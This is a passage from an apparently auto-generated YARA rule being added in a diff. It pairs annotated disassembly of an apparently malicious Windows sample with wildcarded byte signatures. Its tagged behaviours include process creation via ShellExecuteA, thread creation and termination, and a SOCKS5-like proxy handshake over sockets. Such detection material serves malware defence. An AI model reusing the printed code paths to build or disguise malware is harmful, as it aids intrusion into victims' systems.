6A 00 FF D6 } + /* +Basic Block at 0x0040728d@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - create process on Windows + .text:0x0040728d 6a00 push 0 + .text:0x0040728f c745f400000000 mov dword [ebp - 12],0 + .text:0x00407296 c645dc6f mov byte [ebp - 36],111 + .text:0x0040729a c645dd70 mov byte [ebp - 35],112 + .text:0x0040729e c645de65 mov byte [ebp - 34],101 + .text:0x004072a2 c645df6e mov byte [ebp - 33],110 + .text:0x004072a6 c645e000 mov byte [ebp - 32],0 + .text:0x004072aa ffd6 call esi ;kernel32.Sleep(0) + .text:0x004072ac 6a05 push 5 + .text:0x004072ae 6a00 push 0 + .text:0x004072b0 8d95b0fdffff lea edx,dword [ebp - 592] + .text:0x004072b6 6a00 push 0 + .text:0x004072b8 8d45dc lea eax,dword [ebp - 36] + .text:0x004072bb 52 push edx + .text:0x004072bc 50 push eax + .text:0x004072bd 6a00 push 0 + .text:0x004072bf ffd7 call edi ;shell32.ShellExecuteA(0,local40,local596,0,0,5) + .text:0x004072c1 6a00 push 0 + .text:0x004072c3 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004072c5 43 inc ebx + .text:0x004072c6 83fb03 cmp ebx,3 + .text:0x004072c9 7335 jnc 0x00407300 + */ + $c18 = { 6A 00 C7 45 ?? 00 00 00 00 C6 45 ?? 6F C6 45 ?? 70 C6 45 ?? 65 C6 45 ?? 6E C6 45 ?? 00 FF D6 6A 05 6A 00 8D 95 ?? ?? ?? ?? 6A 00 8D 45 ?? 52 50 6A 00 FF D7 6A 00 FF D6 43 83 FB 03 73 ?? 
} + /* +Basic Block at 0x004078e0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - create thread + .text:0x004078e0 + .text:0x004078e0 FUNC: int cdecl sub_004078e0( int arg0, int arg1, int arg2, int arg3, int arg4, int arg5, int arg6, ) [10 XREFS] + .text:0x004078e0 + .text:0x004078e0 Stack Variables: (offset from initial top of stack) + .text:0x004078e0 28: int arg6 + .text:0x004078e0 24: int arg5 + .text:0x004078e0 20: int arg4 + .text:0x004078e0 16: int arg3 + .text:0x004078e0 12: int arg2 + .text:0x004078e0 8: int arg1 + .text:0x004078e0 4: int arg0 + .text:0x004078e0 -4: int local4 + .text:0x004078e0 -8: int local8 + .text:0x004078e0 -12: int local12 + .text:0x004078e0 -16: int local16 + .text:0x004078e0 + .text:0x004078e0 83ec10 sub esp,16 + .text:0x004078e3 8b44241c mov eax,dword [esp + 28] + .text:0x004078e7 8b4c2420 mov ecx,dword [esp + 32] + .text:0x004078eb 8a54242c mov dl,byte [esp + 44] + .text:0x004078ef 56 push esi + .text:0x004078f0 8b3578904000 mov esi,dword [0x00409078] + .text:0x004078f6 6a00 push 0 + .text:0x004078f8 89442408 mov dword [esp + 8],eax + .text:0x004078fc 894c240c mov dword [esp + 12],ecx + .text:0x00407900 88542410 mov byte [esp + 16],dl + .text:0x00407904 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407906 6a00 push 0 + .text:0x00407908 6a00 push 0 + .text:0x0040790a 6a00 push 0 + .text:0x0040790c 6a00 push 0 + .text:0x0040790e ff1584904000 call dword [0x00409084] ;kernel32.CreateEventA(0,0,0,0) + .text:0x00407914 6a00 push 0 + .text:0x00407916 89442414 mov dword [esp + 20],eax + .text:0x0040791a ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040791c 8b4c2428 mov ecx,dword [esp + 40] + .text:0x00407920 8d442430 lea eax,dword [esp + 48] + .text:0x00407924 50 push eax + .text:0x00407925 8b442420 mov eax,dword [esp + 32] + .text:0x00407929 8d542408 lea edx,dword [esp + 8] + .text:0x0040792d 51 push ecx + .text:0x0040792e 8b4c2420 mov ecx,dword [esp + 32] + .text:0x00407932 52 push edx + .text:0x00407933 6890784000 push 0x00407890 + 
.text:0x00407938 50 push eax + .text:0x00407939 51 push ecx + .text:0x0040793a e88d050000 call 0x00407ecc ;msvcrt._beginthreadex(arg0,arg1,0x00407890,local16,arg4,arg6) + .text:0x0040793f 8b542428 mov edx,dword [esp + 40] + .text:0x00407943 83c418 add esp,24 + .text:0x00407946 8bf0 mov esi,eax + .text:0x00407948 6aff push 0xffffffff + .text:0x0040794a 52 push edx + .text:0x0040794b ff158c904000 call dword [0x0040908c] ;kernel32.WaitForSingleObject(kernel32.CreateEventA(0,0,0,0),0xffffffff) + .text:0x00407951 8b442410 mov eax,dword [esp + 16] + .text:0x00407955 50 push eax + .text:0x00407956 ff1588904000 call dword [0x00409088] ;kernel32.CloseHandle(<0x0040790e>) + .text:0x0040795c 8bc6 mov eax,esi + .text:0x0040795e 5e pop esi + .text:0x0040795f 83c410 add esp,16 + .text:0x00407962 c3 ret + */ + $c19 = { 83 EC 10 8B 44 24 ?? 8B 4C 24 ?? 8A 54 24 ?? 56 8B 35 ?? ?? ?? ?? 6A 00 89 44 24 ?? 89 4C 24 ?? 88 54 24 ?? FF D6 6A 00 6A 00 6A 00 6A 00 FF 15 ?? ?? ?? ?? 6A 00 89 44 24 ?? FF D6 8B 4C 24 ?? 8D 44 24 ?? 50 8B 44 24 ?? 8D 54 24 ?? 51 8B 4C 24 ?? 52 68 90 78 40 00 50 51 E8 ?? ?? ?? ?? 8B 54 24 ?? 83 C4 18 8B F0 6A FF 52 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 50 FF 15 ?? ?? ?? ?? 
8B C6 5E 83 C4 10 C3 } + /* +Basic Block at 0x00403685@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - terminate thread + .text:0x00403685 loc_00403685: [1 XREFS] + .text:0x00403685 6a00 push 0 + .text:0x00403687 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403689 8b07 mov eax,dword [edi] + .text:0x0040368b 6aff push 0xffffffff + .text:0x0040368d 50 push eax + .text:0x0040368e ff15c8904000 call dword [0x004090c8] ;kernel32.TerminateThread(0x61616161,0xffffffff) + .text:0x00403694 6a00 push 0 + .text:0x00403696 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403698 8b0f mov ecx,dword [edi] + .text:0x0040369a 51 push ecx + .text:0x0040369b ff1588904000 call dword [0x00409088] ;kernel32.CloseHandle(0x61616161) + .text:0x004036a1 6a00 push 0 + .text:0x004036a3 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004036a5 8b85549f0000 mov eax,dword [ebp + 40788] + .text:0x004036ab 43 inc ebx + .text:0x004036ac 83c704 add edi,4 + .text:0x004036af 3bd8 cmp ebx,eax + .text:0x004036b1 72d2 jc 0x00403685 + */ + $c20 = { 6A 00 FF D6 8B 07 6A FF 50 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8B 0F 51 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8B 85 ?? ?? ?? ?? 43 83 C7 04 3B D8 72 ?? 
} + /* +function at 0x004019c0@9324d1a8ae37a36ae560c37448c9705a with 6 features: + - get socket status + - receive data + - receive data on socket + - resolve DNS + - send data + - send data on socket + .text:0x004019c0 + .text:0x004019c0 FUNC: int stdcall sub_004019c0( int arg0, int arg1, ) [2 XREFS] + .text:0x004019c0 + .text:0x004019c0 Stack Variables: (offset from initial top of stack) + .text:0x004019c0 8: int arg1 + .text:0x004019c0 4: int arg0 + .text:0x004019c0 -600: int local600 + .text:0x004019c0 -603: int local603 + .text:0x004019c0 -604: int local604 + .text:0x004019c0 -607: int local607 + .text:0x004019c0 -608: int local608 + .text:0x004019c0 -862: int local862 + .text:0x004019c0 -863: int local863 + .text:0x004019c0 -864: int local864 + .text:0x004019c0 -1116: int local1116 + .text:0x004019c0 -1120: int local1120 + .text:0x004019c0 -1124: int local1124 + .text:0x004019c0 -1128: int local1128 + .text:0x004019c0 -1132: int local1132 + .text:0x004019c0 -1133: int local1133 + .text:0x004019c0 -1134: int local1134 + .text:0x004019c0 -1135: int local1135 + .text:0x004019c0 -1136: int local1136 + .text:0x004019c0 -1140: int local1140 + .text:0x004019c0 -1144: int local1144 + .text:0x004019c0 -1145: int local1145 + .text:0x004019c0 -1146: int local1146 + .text:0x004019c0 -1147: int local1147 + .text:0x004019c0 -1148: int local1148 + .text:0x004019c0 + .text:0x004019c0 81ec7c040000 sub esp,1148 + .text:0x004019c6 53 push ebx + .text:0x004019c7 55 push ebp + .text:0x004019c8 8b2d14924000 mov ebp,dword [0x00409214] + .text:0x004019ce 56 push esi + .text:0x004019cf 8bf1 mov esi,ecx + .text:0x004019d1 57 push edi + .text:0x004019d2 6a00 push 0 + .text:0x004019d4 8d442414 lea eax,dword [esp + 20] + .text:0x004019d8 8b8ea8000000 mov ecx,dword [esi + 168] + .text:0x004019de 6a04 push 4 + .text:0x004019e0 b302 mov bl,2 + .text:0x004019e2 50 push eax + .text:0x004019e3 51 push ecx + .text:0x004019e4 c744242803000000 mov dword [esp + 40],3 + .text:0x004019ec 
c744242c00000000 mov dword [esp + 44],0 + .text:0x004019f4 c644242005 mov byte [esp + 32],5 + .text:0x004019f9 885c2421 mov byte [esp + 33],bl + .text:0x004019fd c644242200 mov byte [esp + 34],0 + .text:0x00401a02 885c2423 mov byte [esp + 35],bl + .text:0x00401a06 ffd5 call ebp ;ws2_32.send(0x61616161,local1148,4,0) + .text:0x00401a08 b996000000 mov ecx,150 + .text:0x00401a0d 33c0 xor eax,eax + .text:0x00401a0f 8dbc2434020000 lea edi,dword [esp + 564] + .text:0x00401a16 8b96a8000000 mov edx,dword [esi + 168] + .text:0x00401a1c f3ab rep: stosd + .text:0x00401a1e 8d442418 lea eax,dword [esp + 24] + .text:0x00401a22 8d4c242c lea ecx,dword [esp + 44] + .text:0x00401a26 50 push eax + .text:0x00401a27 6a00 push 0 + .text:0x00401a29 6a00 push 0 + .text:0x00401a2b 51 push ecx + .text:0x00401a2c 6a00 push 0 + .text:0x00401a2e 89542444 mov dword [esp + 68],edx + .text:0x00401a32 c744244001000000 mov dword [esp + 64],1 + .text:0x00401a3a ff1510924000 call dword [0x00409210] ;ws2_32.select(0,local1120,0,0,local1140) + .text:0x00401a40 85c0 test eax,eax + .text:0x00401a42 7f0c jg 0x00401a50 + .text:0x00401a44 8b96a8000000 mov edx,dword [esi + 168] + .text:0x00401a4a 52 push edx + .text:0x00401a4b e95d020000 jmp 0x00401cad + .text:0x00401a50 loc_00401a50: [1 XREFS] + .text:0x00401a50 8b8ea8000000 mov ecx,dword [esi + 168] + .text:0x00401a56 6a00 push 0 + .text:0x00401a58 8d842438020000 lea eax,dword [esp + 568] + .text:0x00401a5f 6858020000 push 600 + .text:0x00401a64 50 push eax + .text:0x00401a65 51 push ecx + .text:0x00401a66 ff150c924000 call dword [0x0040920c] ;ws2_32.recv(0x61616161,local600,600) + .text:0x00401a6c 80bc243402000005 cmp byte [esp + 564],5 + .text:0x00401a74 0f852c020000 jnz 0x00401ca6 + .text:0x00401a7a 8a842435020000 mov al,byte [esp + 565] + .text:0x00401a81 84c0 test al,al + .text:0x00401a83 740a jz 0x00401a8f + .text:0x00401a85 3ac3 cmp al,bl + .text:0x00401a87 0f8519020000 jnz 0x00401ca6 + .text:0x00401a8d eb08 jmp 0x00401a97 + .text:0x00401a8f 
loc_00401a8f: [1 XREFS] + .text:0x00401a8f 3ac3 cmp al,bl + .text:0x00401a91 0f8530010000 jnz 0x00401bc7 + .text:0x00401a97 loc_00401a97: [1 XREFS] + .text:0x00401a97 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00401a9d 68a0a54000 push 0x0040a5a0 + .text:0x00401aa2 e8492c0000 call 0x004046f0 ;sub_004046f0(0x0040a5a0) + .text:0x00401aa7 85c0 test eax,eax + .text:0x00401aa9 0f8618010000 jbe 0x00401bc7 + .text:0x00401aaf 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00401ab5 68a0a54000 push 0x0040a5a0 + .text:0x00401aba e8312c0000 call 0x004046f0 ;sub_004046f0(0x0040a5a0) + .text:0x00401abf 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00401ac5 68a0a64000 push 0x0040a6a0 + .text:0x00401aca 8bd8 mov ebx,eax + .text:0x00401acc e81f2c0000 call 0x004046f0 ;sub_004046f0(0x0040a6a0) + .text:0x00401ad1 89442414 mov dword [esp + 20],eax + .text:0x00401ad5 b940000000 mov ecx,64 + .text:0x00401ada 33c0 xor eax,eax + .text:0x00401adc 8dbc2430010000 lea edi,dword [esp + 304] + .text:0x00401ae3 f3ab rep: stosd + .text:0x00401ae5 66ab stosd + .text:0x00401ae7 8b3d94904000 mov edi,dword [0x00409094] + .text:0x00401aed 8d942432010000 lea edx,dword [esp + 306] + .text:0x00401af4 68a0a54000 push 0x0040a5a0 + .text:0x00401af9 52 push edx + .text:0x00401afa c684243801000005 mov byte [esp + 312],5 + .text:0x00401b02 889c2439010000 mov byte [esp + 313],bl + .text:0x00401b09 ffd7 call edi ;kernel32.lstrcpyA(local862,0x0040a5a0) + .text:0x00401b0b 8d442414 lea eax,dword [esp + 20] + .text:0x00401b0f 6a04 push 4 + .text:0x00401b11 8d8c1c36010000 lea ecx,dword [esp + ebx + 310] + .text:0x00401b18 50 push eax + .text:0x00401b19 51 push ecx + .text:0x00401b1a 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00401b20 e83b2a0000 call 0x00404560 ;sub_00404560(0x010c2c61,local1148,4) + .text:0x00401b25 8d941c33010000 lea edx,dword [esp + ebx + 307] + .text:0x00401b2c 68a0a64000 push 0x0040a6a0 + .text:0x00401b31 52 push edx + .text:0x00401b32 ffd7 call edi 
;kernel32.lstrcpyA(0x010c2c62,0x0040a6a0) + .text:0x00401b34 8b442414 mov eax,dword [esp + 20] + .text:0x00401b38 6a00 push 0 + .text:0x00401b3a 8d942434010000 lea edx,dword [esp + 308] + .text:0x00401b41 8d4c1803 lea ecx,dword [eax + ebx + 3] + .text:0x00401b45 8b86a8000000 mov eax,dword [esi + 168] + .text:0x00401b4b 51 push ecx + .text:0x00401b4c 52 push edx + .text:0x00401b4d 50 push eax + .text:0x00401b4e ffd5 call ebp ;ws2_32.send(0x61616161,local864,0x82b78021,0) + .text:0x00401b50 8d542418 lea edx,dword [esp + 24] + .text:0x00401b54 33c0 xor eax,eax + .text:0x00401b56 b996000000 mov ecx,150 + .text:0x00401b5b 8dbc2434020000 lea edi,dword [esp + 564] + .text:0x00401b62 52 push edx + .text:0x00401b63 50 push eax + .text:0x00401b64 f3ab rep: stosd + .text:0x00401b66 8b8ea8000000 mov ecx,dword [esi + 168] + .text:0x00401b6c 50 push eax + .text:0x00401b6d 8d442438 lea eax,dword [esp + 56] + .text:0x00401b71 894c243c mov dword [esp + 60],ecx + .text:0x00401b75 50 push eax + .text:0x00401b76 6a00 push 0 + .text:0x00401b78 c744244001000000 mov dword [esp + 64],1 + .text:0x00401b80 ff1510924000 call dword [0x00409210] ;ws2_32.select(0,local1124,0,0,local1144) + .text:0x00401b86 85c0 test eax,eax + .text:0x00401b88 0f8e18010000 jle 0x00401ca6 + .text:0x00401b8e 8b86a8000000 mov eax,dword [esi + 168] + .text:0x00401b94 6a00 push 0 + .text:0x00401b96 8d942438020000 lea edx,dword [esp + 568] + .text:0x00401b9d 6858020000 push 600 + .text:0x00401ba2 52 push edx + .text:0x00401ba3 50 push eax + .text:0x00401ba4 ff150c924000 call dword [0x0040920c] ;ws2_32.recv(0x61616161,local604,600) + .text:0x00401baa 80bc243402000005 cmp byte [esp + 564],5 + .text:0x00401bb2 0f85ee000000 jnz 0x00401ca6 + .text:0x00401bb8 8a842435020000 mov al,byte [esp + 565] + .text:0x00401bbf 84c0 test al,al + .text:0x00401bc1 0f85df000000 jnz 0x00401ca6 + .text:0x00401bc7 loc_00401bc7: [2 XREFS] + .text:0x00401bc7 8b942490040000 mov edx,dword [esp + 1168] + .text:0x00401bce 52 push edx + 
.text:0x00401bcf ff15fc914000 call dword [0x004091fc] ;ws2_32.gethostbyname(sp+0) + .text:0x00401bd5 85c0 test eax,eax + .text:0x00401bd7 0f84d6000000 jz 0x00401cb3 + .text:0x00401bdd c644242005 mov byte [esp + 32],5 + .text:0x00401be2 c644242101 mov byte [esp + 33],1 + .text:0x00401be7 c644242200 mov byte [esp + 34],0 + .text:0x00401bec c644242301 mov byte [esp + 35],1 + .text:0x00401bf1 8b400c mov eax,dword [eax + 12] + .text:0x00401bf4 8b08 mov ecx,dword [eax] + .text:0x00401bf6 8b842494040000 mov eax,dword [esp + 1172] + .text:0x00401bfd 50 push eax + .text:0x00401bfe 8b11 mov edx,dword [ecx] + .text:0x00401c00 89542428 mov dword [esp + 40],edx + .text:0x00401c04 ff1508924000 call dword [0x00409208] ;ws2_32.ntohs(arg0) + .text:0x00401c0a 8b96a8000000 mov edx,dword [esi + 168] + .text:0x00401c10 6a00 push 0 + .text:0x00401c12 8d4c2424 lea ecx,dword [esp + 36] + .text:0x00401c16 6a0a push 10 + .text:0x00401c18 51 push ecx + .text:0x00401c19 52 push edx + .text:0x00401c1a 6689442438 mov word [esp + 56],ax + .text:0x00401c1f ffd5 call ebp ;ws2_32.send(0x61616161,local1136,10,0) + .text:0x00401c21 b996000000 mov ecx,150 + .text:0x00401c26 33c0 xor eax,eax + .text:0x00401c28 8dbc2434020000 lea edi,dword [esp + 564] + .text:0x00401c2f 8d54242c lea edx,dword [esp + 44] + .text:0x00401c33 f3ab rep: stosd + .text:0x00401c35 8b86a8000000 mov eax,dword [esi + 168] + .text:0x00401c3b 8d4c2418 lea ecx,dword [esp + 24] + .text:0x00401c3f 51 push ecx + .text:0x00401c40 6a00 push 0 + .text:0x00401c42 6a00 push 0 + .text:0x00401c44 52 push edx + .text:0x00401c45 6a00 push 0 + .text:0x00401c47 89442444 mov dword [esp + 68],eax + .text:0x00401c4b c744244001000000 mov dword [esp + 64],1 + .text:0x00401c53 ff1510924000 call dword [0x00409210] ;ws2_32.select(0,local1124,0,0,local1144) + .text:0x00401c59 85c0 test eax,eax + .text:0x00401c5b 7f09 jg 0x00401c66 + .text:0x00401c5d loc_00401c5d: [2 XREFS] + .text:0x00401c5d 8b86a8000000 mov eax,dword [esi + 168] + .text:0x00401c63 50 push 
eax + .text:0x00401c64 eb47 jmp 0x00401cad + .text:0x00401c66 loc_00401c66: [1 XREFS] + .text:0x00401c66 8b96a8000000 mov edx,dword [esi + 168] + .text:0x00401c6c 6a00 push 0 + .text:0x00401c6e 8d8c2438020000 lea ecx,dword [esp + 568] + .text:0x00401c75 6858020000 push 600 + .text:0x00401c7a 51 push ecx + .text:0x00401c7b 52 push edx + .text:0x00401c7c ff150c924000 call dword [0x0040920c] ;ws2_32.recv(0x61616161,local604,600) + .text:0x00401c82 80bc243402000005 cmp byte [esp + 564],5 + .text:0x00401c8a 75d1 jnz 0x00401c5d + .text:0x00401c8c 8a842435020000 mov al,byte [esp + 565] + .text:0x00401c93 84c0 test al,al + .text:0x00401c95 75c6 jnz 0x00401c5d + .text:0x00401c97 5f pop edi + .text:0x00401c98 5e pop esi + .text:0x00401c99 5d pop ebp + .text:0x00401c9a b001 mov al,1 + .text:0x00401c9c 5b pop ebx + .text:0x00401c9d 81c47c040000 add esp,1148 + .text:0x00401ca3 c20800 ret 8 + .text:0x00401ca6 loc_00401ca6: [5 XREFS] + .text:0x00401ca6 8b8ea8000000 mov ecx,dword [esi + 168] + .text:0x00401cac 51 push ecx + .text:0x00401cad loc_00401cad: [2 XREFS] + .text:0x00401cad ff1504924000 call dword [0x00409204] ;ws2_32.closesocket(0x61616161) + .text:0x00401cb3 loc_00401cb3: [1 XREFS] + .text:0x00401cb3 5f pop edi + .text:0x00401cb4 5e pop esi + .text:0x00401cb5 5d pop ebp + .text:0x00401cb6 32c0 xor al,al + .text:0x00401cb8 5b pop ebx + .text:0x00401cb9 81c47c040000 add esp,1148 + .text:0x00401cbf c20800 ret 8 + */ + $c21 = { 81 EC 7C 04 00 00 53 55 8B 2D ?? ?? ?? ?? 56 8B F1 57 6A 00 8D 44 24 ?? 8B 8E ?? ?? ?? ?? 6A 04 B3 02 50 51 C7 44 24 ?? 03 00 00 00 C7 44 24 ?? 00 00 00 00 C6 44 24 ?? 05 88 5C 24 ?? C6 44 24 ?? 00 88 5C 24 ?? FF D5 B9 96 00 00 00 33 C0 8D BC 24 ?? ?? ?? ?? 8B 96 ?? ?? ?? ?? F3 AB 8D 44 24 ?? 8D 4C 24 ?? 50 6A 00 6A 00 51 6A 00 89 54 24 ?? C7 44 24 ?? 01 00 00 00 FF 15 ?? ?? ?? ?? 85 C0 7F ?? 8B 96 ?? ?? ?? ?? 52 E9 ?? ?? ?? ?? 8B 8E ?? ?? ?? ?? 6A 00 8D 84 24 ?? ?? ?? ?? 68 58 02 00 00 50 51 FF 15 ?? ?? ?? ?? 80 BC 24 ?? ?? ?? ?? 05 0F 85 ?? ?? ?? 
?? 8A 84 24 ?? ?? ?? ?? 84 C0 74 ?? 3A C3 0F 85 ?? ?? ?? ?? EB ?? 3A C3 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 68 A0 A5 40 00 E8 ?? ?? ?? ?? 85 C0 0F 86 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 68 A0 A5 40 00 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 68 A0 A6 40 00 8B D8 E8 ?? ?? ?? ?? 89 44 24 ?? B9 40 00 00 00 33 C0 8D BC 24 ?? ?? ?? ?? F3 AB 66 AB 8B 3D ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 A0 A5 40 00 52 C6 84 24 ?? ?? ?? ?? 05 88 9C 24 ?? ?? ?? ?? FF D7 8D 44 24 ?? 6A 04 8D 8C 1C ?? ?? ?? ?? 50 51 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 94 1C ?? ?? ?? ?? 68 A0 A6 40 00 52 FF D7 8B 44 24 ?? 6A 00 8D 94 24 ?? ?? ?? ?? 8D 4C 18 ?? 8B 86 ?? ?? ?? ?? 51 52 50 FF D5 8D 54 24 ?? 33 C0 B9 96 00 00 00 8D BC 24 ?? ?? ?? ?? 52 50 F3 AB 8B 8E ?? ?? ?? ?? 50 8D 44 24 ?? 89 4C 24 ?? 50 6A 00 C7 44 24 ?? 01 00 00 00 FF 15 ?? ?? ?? ?? 85 C0 0F 8E ?? ?? ?? ?? 8B 86 ?? ?? ?? ?? 6A 00 8D 94 24 ?? ?? ?? ?? 68 58 02 00 00 52 50 FF 15 ?? ?? ?? ?? 80 BC 24 ?? ?? ?? ?? 05 0F 85 ?? ?? ?? ?? 8A 84 24 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C6 44 24 ?? 05 C6 44 24 ?? 01 C6 44 24 ?? 00 C6 44 24 ?? 01 8B 40 ?? 8B 08 8B 84 24 ?? ?? ?? ?? 50 8B 11 89 54 24 ?? FF 15 ?? ?? ?? ?? 8B 96 ?? ?? ?? ?? 6A 00 8D 4C 24 ?? 6A 0A 51 52 66 89 44 24 ?? FF D5 B9 96 00 00 00 33 C0 8D BC 24 ?? ?? ?? ?? 8D 54 24 ?? F3 AB 8B 86 ?? ?? ?? ?? 8D 4C 24 ?? 51 6A 00 6A 00 52 6A 00 89 44 24 ?? C7 44 24 ?? 01 00 00 00 FF 15 ?? ?? ?? ?? 85 C0 7F ?? 8B 86 ?? ?? ?? ?? 50 EB ?? 8B 96 ?? ?? ?? ?? 6A 00 8D 8C 24 ?? ?? ?? ?? 68 58 02 00 00 51 52 FF 15 ?? ?? ?? ?? 80 BC 24 ?? ?? ?? ?? 05 75 ?? 8A 84 24 ?? ?? ?? ?? 84 C0 75 ?? 5F 5E 5D B0 01 5B 81 C4 7C 04 00 00 C2 08 00 8B 8E ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 
5F 5E 5D 32 C0 5B 81 C4 7C 04 00 00 C2 08 00 } + /* +function at 0x00401cd0@9324d1a8ae37a36ae560c37448c9705a with 3 features: + - get socket status + - receive data + - receive data on socket + .text:0x00401cd0 + .text:0x00401cd0 FUNC: int stdcall sub_00401cd0( int arg0, ) [1 XREFS] + .text:0x00401cd0 + .text:0x00401cd0 Stack Variables: (offset from initial top of stack) + .text:0x00401cd0 4: int arg0 + .text:0x00401cd0 -8: int local8 + .text:0x00401cd0 -12: int local12 + .text:0x00401cd0 -32: int local32 + .text:0x00401cd0 -36: int local36 + .text:0x00401cd0 -40: int local40 + .text:0x00401cd0 -44: int local44 + .text:0x00401cd0 + .text:0x00401cd0 6aff push 0xffffffff ;int + .text:0x00401cd2 64a100000000 fs: mov eax,dword [0x00000000] + .text:0x00401cd8 68b6834000 push 0x004083b6 + .text:0x00401cdd 50 push eax + .text:0x00401cde b85c230000 mov eax,0x0000235c + .text:0x00401ce3 64892500000000 fs: mov dword [0x00000000],esp + .text:0x00401cea e821610000 call 0x00407e10 ;__alloca_probe() + .text:0x00401cef 53 push ebx + .text:0x00401cf0 55 push ebp + .text:0x00401cf1 8b2d78904000 mov ebp,dword [0x00409078] + .text:0x00401cf7 56 push esi + .text:0x00401cf8 57 push edi + .text:0x00401cf9 6a00 push 0 + .text:0x00401cfb ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401cfd 8d4c243c lea ecx,dword [esp + 60] + .text:0x00401d01 e8faf2ffff call 0x00401000 ;sub_00401000(0xbfb07fd0) + .text:0x00401d06 8d4c2414 lea ecx,dword [esp + 20] + .text:0x00401d0a c784247423000000 mov dword [esp + 9076],0 + .text:0x00401d15 e8e6f2ffff call 0x00401000 ;sub_00401000(local8) + .text:0x00401d1a 8b9c247c230000 mov ebx,dword [esp + 9084] + .text:0x00401d21 c684247423000001 mov byte [esp + 9076],1 + .text:0x00401d29 8bcb mov ecx,ebx + .text:0x00401d2b c784246401000001 mov dword [esp + 356],1 + .text:0x00401d36 8b83a8000000 mov eax,dword [ebx + 168] + .text:0x00401d3c 89842468010000 mov dword [esp + 360],eax + .text:0x00401d43 e888020000 call 0x00401fd0 ;sub_00401fd0(0x61616161) + .text:0x00401d48 
84c0 test al,al + .text:0x00401d4a 0f842d020000 jz 0x00401f7d + .text:0x00401d50 loc_00401d50: [1 XREFS] + .text:0x00401d50 b941000000 mov ecx,65 + .text:0x00401d55 8db42464010000 lea esi,dword [esp + 356] + .text:0x00401d5c 8dbc2468020000 lea edi,dword [esp + 616] + .text:0x00401d63 6a00 push 0 + .text:0x00401d65 f3a5 rep: movsd + .text:0x00401d67 ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401d69 6a00 push 0 + .text:0x00401d6b 6a00 push 0 + .text:0x00401d6d 8d8c2470020000 lea ecx,dword [esp + 624] + .text:0x00401d74 6a00 push 0 + .text:0x00401d76 51 push ecx + .text:0x00401d77 6a00 push 0 + .text:0x00401d79 ff1510924000 call dword [0x00409210] ;ws2_32.select(0,0xbfb081fc,0,0,0) + .text:0x00401d7f 83f8ff cmp eax,0xffffffff + .text:0x00401d82 0f84ee010000 jz 0x00401f76 + .text:0x00401d88 85c0 test eax,eax + .text:0x00401d8a 0f8ed3010000 jle 0x00401f63 + .text:0x00401d90 b900080000 mov ecx,2048 + .text:0x00401d95 33c0 xor eax,eax + .text:0x00401d97 8dbc246c030000 lea edi,dword [esp + 876] + .text:0x00401d9e 6a01 push 1 + .text:0x00401da0 f3ab rep: stosd + .text:0x00401da2 ffd5 call ebp ;kernel32.Sleep(1) + .text:0x00401da4 8b83a8000000 mov eax,dword [ebx + 168] + .text:0x00401daa 6a00 push 0 + .text:0x00401dac 8d942470030000 lea edx,dword [esp + 880] + .text:0x00401db3 6800200000 push 0x00002000 + .text:0x00401db8 52 push edx + .text:0x00401db9 50 push eax + .text:0x00401dba ff150c924000 call dword [0x0040920c] ;ws2_32.recv(0x61616161,0xbfb08300,0x00002000) + .text:0x00401dc0 8bf0 mov esi,eax + .text:0x00401dc2 6a00 push 0 + .text:0x00401dc4 85f6 test esi,esi + .text:0x00401dc6 0f8ea8010000 jle 0x00401f74 + .text:0x00401dcc ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401dce 8d8c246c030000 lea ecx,dword [esp + 876] + .text:0x00401dd5 56 push esi + .text:0x00401dd6 51 push ecx + .text:0x00401dd7 8d4c241c lea ecx,dword [esp + 28] + .text:0x00401ddb e8a0f2ffff call 0x00401080 ;sub_00401080(local12,0xbfb082fc,ws2_32.recv(0x61616161,0xbfb08300,0x00002000)) + 
.text:0x00401de0 b93f000000 mov ecx,63 + .text:0x00401de5 33c0 xor eax,eax + .text:0x00401de7 8d7c2465 lea edi,dword [esp + 101] + .text:0x00401deb c644246400 mov byte [esp + 100],0 + .text:0x00401df0 f3ab rep: stosd + .text:0x00401df2 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00401df8 6800010000 push 256 + .text:0x00401dfd 66ab stosd + .text:0x00401dff 8d542468 lea edx,dword [esp + 104] + .text:0x00401e03 68a0a74000 push 0x0040a7a0 + .text:0x00401e08 52 push edx + .text:0x00401e09 aa stosb + .text:0x00401e0a e851270000 call 0x00404560 ;sub_00404560(0xbfb07fec,0x0040a7a0,256) + .text:0x00401e0f 6a00 push 0 + .text:0x00401e11 ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401e13 83fe09 cmp esi,9 + .text:0x00401e16 7c11 jl 0x00401e29 + .text:0x00401e18 8d84246c030000 lea eax,dword [esp + 876] + .text:0x00401e1f 6a09 push 9 + .text:0x00401e21 8d4c2468 lea ecx,dword [esp + 104] + .text:0x00401e25 50 push eax + .text:0x00401e26 51 push ecx + .text:0x00401e27 eb0e jmp 0x00401e37 + .text:0x00401e29 loc_00401e29: [1 XREFS] + .text:0x00401e29 8d94246c030000 lea 